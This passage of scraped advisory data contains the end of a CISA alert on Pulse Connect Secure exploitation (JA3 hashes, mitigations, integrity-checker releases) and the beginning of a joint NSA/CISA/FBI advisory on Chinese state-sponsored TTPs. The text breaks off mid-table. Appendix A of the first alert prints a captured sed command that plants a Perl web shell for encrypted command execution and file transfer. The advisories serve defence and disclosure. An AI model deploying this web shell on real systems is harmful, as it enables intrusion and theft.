JA3 (often due to User-Agent spoofing) and the prevalence of a given JA3 necessarily differs by environment. The prevalence column of table 2 refers to how often the specific JA3 hash was observed in the dataset that was being analyzed. Some hashes are rarely observed in the dataset and the information is provided for context only. Analytical conclusions should not be made solely based on this reporting. The prevalence of a JA3 hash observed in an environment would need to be further evaluated.\n\n_Table 2: JA3 MD5 hashes and associated prevalence/user-agent_\n\nJA3 Hash | User-Agent | Prevalence \n---|---|--- \n \n227ab2ae6ed6abcc249e8a873a033144\n\n| Firefox (~68-71) | very rare \n \n30017f6f809155387cbcf95be6e7225d\n\n| (UA header frequently not set) | rare \n \n3cbc88eabdac9af71445f9040a6cf46c\n\n| Chrome (~50-57) | very rare \n \n53829d58e2631a372bb4de1be2cbecca\n\n| Chrome (~51-81) | rare \n \n714cdf6e462870e2b85d251a3b22064b\n\n| Firefox (~65-68) | very rare \n \n86cb13d6bbb3ac96b78b408bcfc18794\n\n| Python-requests, many others | common (but rare when used with pulse secure) \n \n8f6747b71d1003df1b7e3e8232b1a7e3\n\n| Chrome (~89) | rare \n \n916e458922ae9a1bab6b1154689c7de7\n\n| Firefox (~60-86) | very rare \n \na29d0d294a6236b5bf0ec2573dd4f02f\n\n| Firefox (~77-87), Chrome (~78-90), others | very rare \n \naf26ba5e85475b634275141e6ed3dc54\n\n| Python-requests, many others | rare \n \nb592adaa596bb72a5c1ccdbecae52e3f\n\n| Chrome (~79-90) | rare \n \nc12f54a3f91dc7bafd92cb59fe009a35\n\n| Office, many others | very rare \n \n### Mitigations\n\n**(_Updated May 3, 2021_)** CISA strongly urges organizations using Pulse Secure devices to immediately:\n\n * Review the [Pulse Secure Connect Integrity Tool Quick Start Guide](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755>) and [Customer FAQs](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44764>)\n * Run the [Pulse Secure Connect Integrity Tool](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755>). \n * The tool requires a reboot.\n * If virtualized, take a snapshot before running.\n * If the appliance is physical, consider the consequences of rebooting and running the tool and contact Ivanti for assistance or questions.\n * **(_Updated May 3, 2021_)** ~~Continue to run the tool daily until the XML mitigations have been implemented or the patch has been deployed.~~ **Note:** the Pulse Secure team released [Security Advisory SA44784](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/SA44784/>) that addresses [CVE-2021-22893](<https://vulners.com/cve/CVE-2021-22893>), CVE-2021-22984, CVE-2021-22899, and CVE-2021-22900 with patches.\n * ~~Implement the mitigations released by the vendor. According Ivanti Pulse Secure, the interim XML configurations listed in the \"Workaround\" section of [SA44784 - 2021-04: Out-of-Cycle Advisory: Pulse Connect Secure RCE Vulnerability (CVE-2021-22893)](<https://kb.pulsesecure.net/pkb_mobile#article/l:en_US/SA44784/s>) provide significant protection against threat actor activity.~~\n * **(_Updated May 3, 2021_)** Update to the latest software version.~~, per the process outlined on Ivanti Pulse Secure\u2019s website which contains security enhancements.~~\n * _**(Updated May 27, 2021)**_ Using the Pulse Secure Integrity Checker. The Integrity Checker Tool (ICT) helps system owners understand if their Pulse Secure Connect device has been compromised. While the tool is accurate, there are several nuances to its effective use. \n * The ICT detects evidence of adversary cleanup only on the current, running version of PCS.\n * It may be necessary to roll back the current PCS version to have a valid run of the ICT.\n * During the upgrade process, the active version becomes a rollback partition.\n * Only one rollback partition exists on a device, as the rollback partition is replaced on each update.\n * Therefore, if an entity has updated their PCS device without running the correct version of the ICT (as outlined in Appendix B), anomalous activity will not be detected. \n\n\nIf the Integrity Checker Tools finds mismatched or unauthorized files, CISA urges organizations to:\n\n * Contact CISA to report your findings (see Contact Information section below).\n * Contact [Ivanti Pulse Secure](<https://support.pulsesecure.net/support/support-contacts/>) for assistance in capturing forensic information.\n * Review \u201cUnauthenticated Web Requests\u201d log for evidence of exploitation, if enabled.\n * Change all passwords associated with accounts passing through the Pulse Secure environment (including user accounts, service accounts, administrative accounts and any accounts that could be modified by any account described above, all of these accounts should be assumed to be compromised). **Note: **Unless an exhaustive password reset occurs, factory resetting a Pulse Connect Secure appliance (see Step 3 below) will only remove malicious code from the device, and may not remove the threat actor from the environment. The threat actor may use the credentials harvested to regain access even after the appliance is fully patched.\n * Review logs for any unauthorized authentications originating from the Pulse Connect Secure appliance IP address or the DHCP lease range of the Pulse Connect Secure appliance's VPN lease pool.\n * _**(Updated May 27, 2021)** _**Note: **adversary activity may not be easily identifiable on your network as it may appear as a normal user traffic. If a device has been compromised, entities should take all precautions as if the adversary has intruded past the device into your network and take steps to ensure there are no further signs of an intrusion into networks that include: \n * Look for unauthorized applications and scheduled tasks in environments. \n * Ensure no new administrators were created.\n * Ensure non-privileged users were not added to privileged groups.\n * Scrutinize and monitor all accounts with domain administrator privileges. \n * Monitor domain administrator accounts to ensure they are only accessing the part of the network they are authorized to access. \n * Check all accounts should be checked to ensure they have the proper level of privileges and have not been altered such as increased privileges. \n * Remove any remote access programs not approved by the organization.\n * Carefully inspect scheduled tasks for scripts or executables that may allow a threat actor to connect to an environment.\n\nIn addition to the recommendations above, organizations that find evidence of malicious, suspicious, or anomalous activity or files, should consider the guidance in [KB44764 - Customer FAQ: PCS Security Integrity Tool Enhancements](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44764>), which includes:\n\nAfter preservation, you can remediate your Pulse Connect Secure appliance by: \n\n 1. Disabling the external-facing interface. \n 2. Saving the system and user config.\n 3. Performing a factory reset via the Serial Console. **Note: **For more information refer to [KB22964](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB22964/?kA1j0000000FjFj>) (How to reset a PCS device to the factory default setting via the serial console)\n 4. Updating the appliance to the newest version.\n 5. Re-importing the saved config. \n 6. Re-enabling the external interface. \n\nCISA recommends performing checks to ensure any infection is remediated, even if the workstation or host has been reimaged. These checks should include running the [Pulse Secure Connect Integrity Tool](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755>) again after remediation has been taken place.\n\nCISA would like to thank Ivanti for their contributions to this Alert.\n\n### Contact Information\n\nCISA encourages recipients of this report to contribute any additional information that they may have related to this threat. For any questions related to this report, please contact CISA at\n\n * 1-888-282-0870 (From outside the United States: +1-703-235-8832)\n * [central@cisa.dhs.gov ](<mailto:Central@cisa.dhs.gov>)(UNCLASS)\n * us-cert@dhs.sgov.gov (SIPRNET)\n * us-cert@dhs.ic.gov (JWICS)\n\nCISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on the CISA/US-CERT homepage at <http://www.us-cert.cisa.gov/>.\n\n### Appendix A: Large sed Command Found In Unauthenticated Logs\n\n`Unauthenticated request url /dana-na/[redacted]?id=sed%20-i%20%22/main();/cuse%20MIME::Base64;use%20Crypt::RC4;my%20[redacted];sub%20r{my%20\\$n=\\$_[0];my%20\\$rs;for%20(my%20\\$i=0;\\$i%3C\\$n;\\$i++){my%20\\$n1=int(rand(256));\\$rs.=chr(\\$n1);}return%20\\$rs;}sub%20a{my%20\\$st=\\$_[0];my%20\\$k=r([redacted]);my%20\\$en%20=%20RC4(%20\\$k.\\$ph,%20\\$st);return%20encode_base64(\\$k.\\$en);}sub%20b{my%20\\$s=%20decode_base64(\\$_[0]);%20my%20\\$l=length(\\$s);my%20\\$k=%20substr(\\$s,0,[redacted]);my%20\\$en=substr(\\$s,[redacted],\\$l-[redacted]);my%20\\$de%20=%20RC4(%20\\$k.\\$ph,%20\\$en%20);return%20\\$de;}sub%20c{my%20\\$fi=CGI::param(%27img%27);my%20\\$FN=b(\\$fi);my%20\\$fd;print%20\\%22Content-type:%20application/x-download\\\\n\\%22;open(*FILE,%20\\%22%3C\\$FN\\%22%20);while(%3CFILE%3E){\\$fd=\\$fd.\\$_;}close(*FILE);print%20\\%22Content-Disposition:%20attachment;%20filename=tmp\\\\n\\\\n\\%22;print%20a(\\$fd);}sub%20d{print%20\\%22Cache-Control:%20no-cache\\\\n\\%22;print%20\\%22Content-type:%20text/html\\\\n\\\\n\\%22;my%20\\$fi%20=%20CGI::param(%27cert%27);\\$fi=b(\\$fi);my%20\\$pa=CGI::param(%27md5%27);\\$pa=b(\\$pa);open%20(*outfile,%20\\%22%3E\\$pa\\%22);print%20outfile%20\\$fi;close%20(*outfile);}sub%20e{print%20\\%22Cache-Control:%20no-cache\\\\n\\%22;print%20\\%22Content-type:%20image/gif\\\\n\\\\n\\%22;my%20\\$na=CGI::param(%27name%27);\\$na=b(\\$na);my%20\\$rt;if%20(!\\$na%20or%20\\$na%20eq%20\\%22cd\\%22)%20{\\$rt=\\%22Error%20404\\%22;}else%20{my%20\\$ot=\\%22/tmp/1\\%22;system(\\%22\\$na%20%3E/tmp/1%202%3E&1\\%22);open(*cmd_result,\\%22%3C\\$ot\\%22);while(%3Ccmd_result%3E){\\$rt=\\$rt.\\$_;}close(*cmd_result);unlink%20\\$ot}%20%20print%20a(\\$rt);}sub%20f{if(CGI::param(%27cert%27)){d();}elsif(CGI::param(%27img%27)%20and%20CGI::param(%27name%27)){c();}elsif(CGI::param(%27name%27)%20and%20CGI::param(%27img%27)%20eq%20\\%22\\%22){e();}else{%20%20%20&main();}}if%20(\\$ENV{%27REQUEST_METHOD%27}%20eq%20\\%22POST\\%22){%20%20f();}else{&main();%20}%22%20/home/webserver/htdocs/dana-na/[redacted] came from IP XX.XX.XX.XX`\n\n### Appendix B: ICT Releases\n\n_Table 3: ICT Releases \u2013 releases are cumulative_\n\n**Release Package ** | **Supported Versions (n+1 always supports nth versions)** | Release Date \n---|---|--- \npackage-integrity-checker-11951.1.pkg | \n\n * 8.3R7.1 (build 65025)\n * 9.1R7 (build 6567)\n * 9.1R8 (build 7453)\n * 9.1R8.1 (build 7851)\n * 9.1R8.2 (build 8511)\n * 9.1R9 (build 9189)\n * 9.1R9.1 (build 9701)\n * 9.1R10 (build 10119)\n * 9.1R11 (build 11161)\n * 9.1R11.1 (build 11915)\n| 3/31/2021 (ICTv1 released to public on 3/31/2021) *Initial build \npackage-integrity-checker-12255.1.pkg | \n\n * 9.1R8.4 (build 12177)\n * 9.1R9.2 (build 12181)\n * 9.1R10.2 (build 12179)\n * 9.1R11.3 (build 12173)\n * 9.1R1(build 1505)\n * 9.1R2 (build 2331) \n * 9.1R3 (build 3535)\n * 9.1R4 (build 4763)\n * 9.1R4.1 (build 4967)\n * 9.1R4.2 (build 5035)\n * 9.1R4.3 (build 5185)\n * 9.1R5 (build 5459)\n * 9.1R6 (build 5801)\n| 4/17/2021 (ICTv2 released to public on 4/18/2021) \npackage-integrity-checker-12363.1.pkg | \n\n * 9.1R11.3:HF1(build 12235)\n * 9.1R9.1HF1 (build 10625.1)\n * 9.1R11.1HF1(build 12049.1)\n * 9.1R11.4 (build 12319)\n| 5/3/2021 (ICTv3 released to public on 5/3/2021) \n \n### References\n\n[FireEye blog: Check Your Pulse: Suspected APT Actors Leverage Authentication Bypass Techniques and Pulse Secure Zero-Day](<https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html>)\n\n[CERT/CC Vulnerability Note VU#213092 Pulse Connect Secure vulnerable to authentication bypass](<https://www.kb.cert.org/vuls/id/213092>)\n\n### Revisions\n\nApril 20, 2021: Initial version|April 21, 2021: Added CERT/CC Vulnerability Note to References|April 26, 2021: Added IOC STIX File|April 30, 2021: Replaced IOC STIX File; Added new Detection Section|May 3, 2021: Added Ivanti Security Update Information|May 27, 2021: Added additional technical details and Appendix B|July 21, 2021: Added update note directing reader to review new Malware Analysis Reports|August 3, 2021: Added bulleted list of July 21 MARs|August 11, 2021: Added Ivanti Security Update Information|August 24, 2021: Added new Malware Analysis Reports\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-08-24T12:00:00", "type": "ics", "title": "Exploitation of Pulse Connect Secure Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-22984", "CVE-2023-27350"], "modified": "2021-08-24T12:00:00", "id": "AA21-110A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-110a", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T16:32:05", "description": "### Summary\n\n_This advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework, Version 9, and MITRE D3FEND\u2122 framework, version 0.9.2-BETA-3. See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v8/techniques/enterprise/>) for all referenced threat actor tactics and techniques and the [D3FEND framework](<https://d3fend.mitre.org/>) for referenced defensive tactics and techniques._\n\nThe National Security Agency, Cybersecurity and Infrastructure Security Agency (CISA), and Federal Bureau of Investigation (FBI) assess that People\u2019s Republic of China state-sponsored malicious cyber activity is a major threat to U.S. and Allied cyberspace assets. Chinese state-sponsored cyber actors aggressively target U.S. and allied political, economic, military, educational, and critical infrastructure (CI) personnel and organizations to steal sensitive data, critical and emerging key technologies, intellectual property, and personally identifiable information (PII). Some target sectors include managed service providers, semiconductor companies, the Defense Industrial Base (DIB), universities, and medical institutions. These cyber operations support China\u2019s long-term economic and military development objectives.\n\nThis Joint Cybersecurity Advisory (CSA) provides information on tactics, techniques, and procedures (TTPs) used by Chinese state-sponsored cyber actors. This advisory builds on previous NSA, CISA, and FBI reporting to inform federal, state, local, tribal, and territorial (SLTT) government, CI, DIB, and private industry organizations about notable trends and persistent TTPs through collaborative, proactive, and retrospective analysis.\n\nTo increase the defensive posture of their critical networks and reduce the risk of Chinese malicious cyber activity, NSA, CISA, and FBI urge government, CI, DIB, and private industry organizations to apply the recommendations listed in the Mitigations section of this advisory and in Appendix A: Chinese State-sponsored Cyber Actors' Observed Procedures. **Note:** NSA, CISA, and FBI encourage organization leaders to review [CISA Joint Insights: Chinese Malicious Cyber Activity: Threat Overview for Leaders](<https://www.cisa.gov/publication/chinese-cyber-threat-overview-and-actions-leaders>) for information on this threat to their organization.\n\n[Click here](<https://media.defense.gov/2021/Jul/19/2002805003/-1/-1/1/CSA_CHINESE_STATE-SPONSORED_CYBER_TTPS.PDF>) for a PDF version of this report.\n\n### Technical Details\n\n#### **Trends in Chinese State-Sponsored Cyber Operations**\n\nNSA, CISA, and FBI have observed increasingly sophisticated Chinese state-sponsored cyber activity targeting U.S. political, economic, military, educational, and CI personnel and organizations. NSA, CISA, and FBI have identified the following trends in Chinese state-sponsored malicious cyber operations through proactive and retrospective analysis:\n\n * **Acquisition of Infrastructure and Capabilities**. Chinese state-sponsored cyber actors remain agile and cognizant of the information security community\u2019s practices. These actors take effort to mask their activities by using a revolving series of virtual private servers (VPSs) and common open-source or commercial penetration tools.\n\n * **Exploitation of Public Vulnerabilities. **Chinese state-sponsored cyber actors consistently scan target networks for critical and high vulnerabilities within days of the vulnerability\u2019s public disclosure. In many cases, these cyber actors seek to exploit vulnerabilities in major applications, such as Pulse Secure, Apache, F5 Big-IP, and Microsoft products. For information on Common Vulnerabilities and Exposures (CVE) known to be exploited by malicious Chinese state-sponsored cyber actors, see:\n\n * CISA-FBI Joint CSA AA20-133A: [Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>),\n\n * CISA Activity Alert: AA20-275A: [Potential for China Cyber Response to Heightened U.S.-China Tensions](<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>), and\n\n * NSA CSA U/OO/179811-20: [Chinese State-Sponsored Actors Exploit Publicly Known Vulnerabilities](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>).\n\n * **Encrypted Multi-Hop Proxies. **Chinese state-sponsored cyber actors have been routinely observed using a VPS as an encrypted proxy. The cyber actors use the VPS as well as small office and home office (SOHO) devices as operational nodes to evade detection.\n\n#### **Observed Tactics and Techniques**\n\nChinese state-sponsored cyber actors use a full array of tactics and techniques to exploit computer networks of interest worldwide and to acquire sensitive intellectual property, economic, political, and military information. Appendix B: MITRE ATT&CK Framework lists the tactics and techniques used by Chinese state-sponsored cyber actors. A downloadable [JSON file](<https://github.com/nsacyber/chinese-state-sponsored-cyber-operations-observed-ttps>) is also available on the [NSA Cybersecurity GitHub page](<https://github.com/nsacyber>).\n\nRefer to Appendix A: Chinese State-Sponsored Cyber Actors\u2019 Observed Procedures for information on procedures affiliated with these tactics and techniques as well as applicable mitigations.\n\n\n\n_Figure 1: Example of tactics and techniques used in various cyber operations._\n\n### Mitigations\n\nNSA, CISA, and FBI urge federal and SLTT government, CI, DIB, and private industry organizations to apply the following recommendations as well as the detection and mitigation recommendations in Appendix A, which are tailored to observed tactics and techniques:\n\n * **Patch systems and equipment promptly and diligently. **Focus on patching critical and high vulnerabilities that allow for remote code execution or denial-of-service on externally facing equipment and CVEs known to be exploited by Chinese state-sponsored cyber actors. Consider implementing a patch management program that enables a timely and thorough patching cycle. \n**Note: **for more information on CVEs routinely exploited by Chinese state-sponsored cyber actors refer to the resources listed in the Trends in Chinese State-Sponsored Cyber Operations section.\n\n * **Enhance monitoring of network traffic, email, and endpoint systems.** Review network signatures and indicators for focused activities, monitor for new phishing themes, and adjust email rules accordingly. Follow the best practices of restricting attachments via email and blocking URLs and domains based upon reputation. Ensure that log information is aggregated and correlated to enable maximum detection capabilities, with a focus on monitoring for account misuse. Monitor common ports and protocols for command and control (C2) activity. SSL/TLS inspection can be used to see the contents of encrypted sessions to look for network-based indicators of malware communication protocols. Implement and enhance network and endpoint event analysis and detection capabilities to identify initial infections, compromised credentials, and the manipulation of endpoint processes and files.\n * **Use protection capabilities to stop malicious activity. **Implement anti-virus software and other endpoint protection capabilities to automatically detect and prevent malicious files from executing. Use a network intrusion detection and prevention system to identify and prevent commonly employed adversarial malware and limit nefarious data transfers. Use a domain reputation service to detect suspicious or malicious domains. Use strong credentials for service accounts and multi-factor authentication (MFA) for remote access to mitigate an adversary's ability to leverage stolen credentials, but be aware of MFA interception techniques for some MFA implementations.\u25aa\n\n### Resources\n\nRefer to [us-cert.cisa.gov/china](<https://us-cert.cisa.gov/china>), <https://www.ic3.gov/Home/IndustryAlerts>, and [https://www.nsa.gov/What-We-Do/Cybersecurity/Advisories-Technical-Guidance/ ](<https://www.nsa.gov/What-We-Do/Cybersecurity/Advisories-Technical-Guidance/>)for previous reporting on Chinese state-sponsored malicious cyber activity.\n\n### Disclaimer of Endorsement\n\nThe information and opinions contained in this document are provided \"as is\" and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes.\n\n### Purpose\n\nThis document was developed by NSA, CISA, and FBI in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders. \nThis document is marked TLP:WHITE. Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol, see [http://www.us-cert.gov/tlp/.](<http://www.us-cert.gov/tlp/>)\n\n### Trademark Recognition\n\nMITRE and ATT&CK are registered trademarks of The MITRE Corporation. \u2022 D3FEND is a trademark of The MITRE Corporation. \u2022 Microsoft, Microsoft Exchange, Office 365, Microsoft Office, OneDrive, Outlook, OWA, PowerShell, Windows Defender, and Windows are registered trademarks of Microsoft Corporation. \u2022 Pulse Secure is a registered trademark of Pulse Secure, LLC. \u2022 Apache is a registered trademark of Apache Software Foundation. \u2022 F5 and BIG-IP are registered trademarks of F5 Networks. \u2022 Cobalt Strike is a registered trademark of Strategic Cyber LLC. \u2022 GitHub is a registered trademark of GitHub, Inc. \u2022 JavaScript is a registered trademark of Oracle Corporation. \u2022 Python is a registered trademark of Python Software Foundation. \u2022 Unix is a registered trademark of The Open Group. \u2022 Linux is a registered trademark of Linus Torvalds. \u2022 Dropbox is a registered trademark of Dropbox, Inc.\n\n### APPENDIX A: Chinese State-Sponsored Cyber Actors\u2019 Observed Procedures\n\n**Note: **D3FEND techniques are based on the Threat Actor Procedure(s) and may not match automated mappings to ATT&CK techniques and sub-techniques.\n\n### Tactics: _Reconnaissance_ [[TA0043](<https://attack.mitre.org/versions/v9/tactics/TA0043>)] \n\n_Table 1: Chinese state-sponsored cyber actors\u2019 Reconnaissance TTPs with detection and mitigation recommendations_\n\nThreat Actor \nTechnique / Sub-Techniques\n\n| \n\nThreat Actor Procedure(s)\n\n| \n\nDetection and Mitigation Recommendations\n\n| \n\nDefensive Tactics and Techniques \n \n---|---|---|--- \n \nActive Scanning [[T1595](<https://attack.mitre.org/versions/v9/techniques/T1595>)] \n\n| \n\nChinese state-sponsored cyber actors have been assessed to perform reconnaissance on Microsoft\u00ae 365 (M365), formerly Office\u00ae 365, resources with the intent of further gaining information about the networks. These scans can be automated, through Python\u00ae scripts, to locate certain files, paths, or vulnerabilities. The cyber actors can gain valuable information on the victim network, such as the allocated resources, an organization\u2019s fully qualified domain name, IP address space, and open ports to target or exploit.\n\n| \n\nMinimize the amount and sensitivity of data available to external parties, for example: \n\n * Scrub user email addresses and contact lists from public websites, which can be used for social engineering, \n\n * Share only necessary data and information with third parties, and \n\n * Monitor and limit third-party access to the network. \n\nActive scanning from cyber actors may be identified by monitoring network traffic for sources associated with botnets, adversaries, and known bad IPs based on threat intelligence.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Connection Attempt Analysis [[D3-CAA](<https://d3fend.mitre.org/technique/d3f:ConnectionAttemptAnalysis>)]\n\nIsolate: \n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)] \n \nGather Victim Network Information [[T1590](<https://attack.mitre.org/versions/v9/techniques/T1590>)] \n \n### Tactics: _Resource Development_ [[TA0042](<https://attack.mitre.org/versions/v9/tactics/TA0042>)]\n\n_Table II: Chinese state-sponsored cyber actors\u2019 Resource Development TTPs with detection and mitigation recommendations_\n\nThreat Actor \nTechnique / Sub-Techniques\n\n| \n\nThreat Actor Procedure(s)\n\n| \n\nDetection and Mitigation Recommendations\n\n| Defensive Tactics and Techniques \n---|---|---|--- \n \nAcquire Infrastructure [[T1583](<https://attack.mitre.org/versions/v9/techniques/T1583>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using VPSs from cloud service providers that are physically distributed around the world to host malware and function as C2 nodes.\n\n| \n\nAdversary activities occurring outside the organization\u2019s boundary of control and view makes mitigation difficult. Organizations can monitor for unexpected network traffic and data flows to and from VPSs and correlate other suspicious activity that may indicate an active threat.\n\n| \n\nN/A \n \nStage Capabilities [[T1608](<https://attack.mitre.org/versions/v9/techniques/T1608>)] \n \nObtain Capabilities [[T1588](<https://attack.mitre.org/versions/v9/techniques/T1588>)]: \n\n * Tools [[T1588.002](<https://attack.mitre.org/versions/v9/techniques/T1588/002>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using Cobalt Strike\u00ae and tools from GitHub\u00ae on victim networks. \n\n| \n\nOrganizations may be able to identify malicious use of Cobalt Strike by:\n\n * Examining network traffic using Transport Layer Security (TLS) inspection to identify Cobalt Strike. Look for human generated vice machine-generated traffic, which will be more uniformly distributed. \n\n * Looking for the default Cobalt Strike TLS certificate. \n\n * Look at the user agent that generates the TLS traffic for discrepancies that may indicate faked and malicious traffic.\n\n * Review the traffic destination domain, which may be malicious and an indicator of compromise.\n\n * Look at the packet's HTTP host header. If it does not match with the destination domain, it may indicate a fake Cobalt Strike header and profile.\n\n * Check the Uniform Resource Identifier (URI) of the flow to see if it matches one associated with Cobalt Strike's malleable C2 language. If discovered, additional recovery and investigation will be required.\n\n| N/A \n \n### Tactics: _Initial Access_ [[TA0001](<https://attack.mitre.org/versions/v9/tactics/TA0001/>)]\n\n_Table III: Chinese state-sponsored cyber actors\u2019 Initial Access TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques\n\n| \n\nThreat Actor Procedure(s)\n\n| \n\nDetection and Mitigation Recommendations\n\n| \n\nDetection and Mitigation Recommendations \n \n---|---|---|--- \n \nDrive By Compromise [[T1189](<https://attack.mitre.org/versions/v9/techniques/T1189>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed gaining access to victim networks through watering hole campaigns of typo-squatted domains.\n\n| \n\n * Ensure all browsers and plugins are kept up to date.\n * Use modern browsers with security features turned on.\n * Restrict the use of unneeded websites, block unneeded downloads/attachments, block unneeded JavaScript\u00ae, restrict browser extensions, etc.\n * Use adblockers to help prevent malicious code served through advertisements from executing. \n * Use script blocking extensions to help prevent the execution of unneeded JavaScript, which may be used during exploitation processes. \n * Use browser sandboxes or remote virtual environments to mitigate browser exploitation.\n * Use security applications that look for behavior used during exploitation, such as Windows Defender\u00ae Exploit Guard (WDEG).\n| \n\nDetect: \n\n * Identifier Analysis \n * Homoglyph Detection [[D3-HD](<https://d3fend.mitre.org/technique/d3f:HomoglyphDetection>)]\n * URL Analysis [[D3-UA](<https://d3fend.mitre.org/technique/d3f:URLAnalysis>)]\n * File Analysis \n * Dynamic Analysis [[D3-DA](<https://d3fend.mitre.org/technique/d3f:DynamicAnalysis>)]\n\nIsolate: \n\n * Execution Isolation \n * Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]\n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)]\n * Network Isolation \n * DNS Denylisting [[D3-DNSDL](<https://d3fend.mitre.org/technique/d3f:DNSDenylisting>)] \n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \nExploit Public-Facing Application [[T1190](<https://attack.mitre.org/versions/v9/techniques/T1190>)]\n\n| \n\nChinese state-sponsored cyber actors have exploited known vulnerabilities in Internet-facing systems.[[1](<https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html%20>)] For information on vulnerabilities known to be exploited by Chinese state-sponsored cyber actors, refer to the Trends in Chinese State-Sponsored Cyber Operations section for a list of resources. \nChinese state-sponsored cyber actors have also been observed:\n\n * Using short-term VPS devices to scan and exploit vulnerable Microsoft Exchange\u00ae Outlook Web Access (OWA\u00ae) and plant webshells.\n\n * Targeting on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments to gain access to cloud resources.\n\n * Deploying a public proof of concept (POC) exploit targeting a public-facing appliance vulnerability.\n\n| \n\nReview previously published alerts and advisories from NSA, CISA, and FBI, and diligently patch vulnerable applications known to be exploited by cyber actors. Refer to the Trends in Chinese State-Sponsored Cyber Operations section for a non-inclusive list of resources.\n\nAdditional mitigations include:\n\n * Consider implementing Web Application Firewalls (WAF), which can prevent exploit traffic from reaching an application.\n * Segment externally facing servers and services from the rest of the network with a demilitarized zone (DMZ).\n * Use multi-factor authentication (MFA) with strong factors and require regular re-authentication.\n * Disable protocols using weak authentication.\n * Limit access to and between cloud resources with the desired state being a Zero Trust model. For more information refer to NSA Cybersecurity Information Sheet: [[Embracing a Zero Trust Security Model](<https://media.defense.gov/2021/Feb/25/2002588479/-1/-1/0/CSI_EMBRACING_ZT_SECURITY_MODEL_UOO115131-21.PDF>)].\n * When possible, use cloud-based access controls on cloud resources (e.g., cloud service provider (CSP)-managed authentication between virtual machines).\n * Use automated tools to audit access logs for security concerns.\n * Where possible, enforce MFA for password resets.\n * Do not include Application Programing Interface (API) keys in software version control systems where they can be unintentionally leaked.\n| \n\nHarden:\n\n * Application Hardening [[D3-AH](<https://d3fend.mitre.org/technique/d3f:ApplicationHardening>)]\n * Platform Hardening \n * Software Update [[D3-SU](<https://d3fend.mitre.org/technique/d3f:SoftwareUpdate>)]\n\nDetect:\n\n * File Analysis [[D3-FA](<https://d3fend.mitre.org/technique/d3f:FileAnalysis>)] \n * Network Traffic Analysis \n * Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]\n * Process Analysis \n * Process Spawn Analysis\n * Process Lineage Analysis [[D3-PLA](<https://d3fend.mitre.org/technique/d3f:ProcessLineageAnalysis>)]\n\nIsolate: \n\n * Network Isolation \n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)] \n \nPhishing [[T1566](<https://attack.mitre.org/versions/v9/techniques/T1566>)]: \n\n * Spearphishing Attachment [[T1566.001](<https://attack.mitre.org/versions/v9/techniques/T1566/001>)] \n\n * Spearphishing Link 